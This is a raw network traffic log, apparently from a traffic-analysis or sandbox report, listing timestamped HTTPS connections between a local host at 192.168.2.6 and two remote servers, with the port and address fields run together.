                                                                                                                                                                      Nov 21, 2024 06:25:01.994365931 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.994366884 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.996747017 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.996793985 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.996870041 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.997006893 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.997021914 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.102217913 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.105331898 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.105499983 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.105499983 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.105499983 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.108123064 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.108208895 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.108298063 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.108556032 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.108592987 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.160142899 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.163355112 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.163413048 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.163516045 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.163542032 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.163562059 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.163569927 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.167917967 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.167989969 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.168148041 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.168282986 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.168317080 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.224940062 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.227873087 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.227956057 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.228027105 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.228028059 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.228046894 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.228060007 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.230478048 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.230518103 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.230580091 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.230720043 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.230740070 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.304436922 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.304503918 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.313608885 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.317059040 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.317234993 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.317280054 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.317290068 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.317300081 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.317306042 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.319794893 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.319861889 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.319976091 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.320359945 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.320389032 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:02.413724899 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:02.413753986 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.814399958 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.814565897 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.814759970 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:25:03.825062037 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.825742960 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:03.825792074 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.826489925 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:03.826503992 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.851602077 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.852122068 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:03.852158070 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:03.852544069 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:03.852560043 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.008246899 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:25:04.008337021 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.040730953 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.041261911 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.041291952 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.041884899 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.041893959 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.047673941 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.048135996 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.048177004 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.048758984 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.048770905 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.259511948 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.262572050 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.266000032 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.266077042 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.266077042 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.266115904 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.266139984 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.269205093 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.269258976 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.269340992 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.269531965 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.269551992 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.307362080 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.310463905 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.314018011 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.314095020 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.314095020 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.314129114 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.314152956 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.317244053 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.317286968 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.317378998 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.317532063 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.317540884 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.477685928 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.477761984 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.477838039 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.477900028 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.477936983 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.477988005 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.478198051 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.478198051 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.478234053 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.478255987 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.481023073 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.481101990 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.481182098 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.481326103 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.481347084 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.500272989 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.500335932 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.500392914 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.500432014 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.500478029 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.500533104 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.500570059 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.500605106 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.500639915 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.500670910 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.503042936 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.503072023 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.503144979 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.503318071 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:04.503330946 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.042500019 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.043117046 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.043143034 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.043931961 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.043937922 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.115782976 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.116285086 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.116339922 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.116997004 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.117012024 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.262619019 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.263206005 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.263283014 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.263616085 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.263632059 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.282285929 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.282834053 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.282856941 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.283411026 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.283415079 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.506042004 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.509145021 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.509213924 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.509216070 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.509267092 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.509366989 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.509383917 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.509394884 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.509399891 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.512701035 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.512774944 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.512862921 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.513067961 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.513092995 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.568618059 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.571930885 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.572001934 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.572083950 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.572083950 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.572135925 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.572170019 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.574738979 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.574789047 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.574867010 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.575047970 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.575061083 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.706657887 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.709821939 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.709883928 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.709927082 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.709949017 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.709964991 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.709973097 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.716707945 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.716753960 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.716836929 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.717081070 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.717094898 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.725121021 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.728501081 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.728558064 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.728843927 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.728866100 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.728878021 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.728883028 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.740446091 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.740499973 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:06.740575075 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.740786076 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:06.740806103 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.082134008 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.082719088 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.082748890 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.083302975 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.083309889 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.535840034 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.535975933 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.536109924 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.536413908 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.536437035 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.536452055 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.536458015 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.539752960 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.539803028 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:07.539887905 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.540086985 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:07.540097952 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.294872046 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.295521021 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.295561075 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.296102047 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.296109915 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.353225946 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.353784084 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.353806973 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.354408979 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.354413033 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.499208927 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.499900103 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.499917030 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.500510931 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.500519037 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.517131090 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.517599106 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.517631054 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.518083096 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.518090010 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.738627911 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.741760969 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.741826057 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.742507935 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.742538929 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.742557049 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.742563009 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.746886969 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.746937990 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.747031927 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.747232914 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.747251987 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.797668934 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.800827026 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.800882101 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.800884008 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.800937891 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.800996065 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.801022053 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.801033974 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.801038980 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.803961039 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.803987980 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.804064989 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.804205894 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.804219961 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.964378119 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.964437008 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.964524984 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.964760065 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.964807034 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.964837074 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.964853048 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.968198061 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.968245983 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.968341112 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.968513012 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.968532085 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.993647099 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.996583939 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.996659040 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.996696949 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.996722937 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.996732950 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.996738911 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:08.999917030 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:08.999960899 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.000047922 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.000215054 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.000226021 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.263008118 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.263664961 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.263684988 CET4435003413.107.246.45192.168.2.6
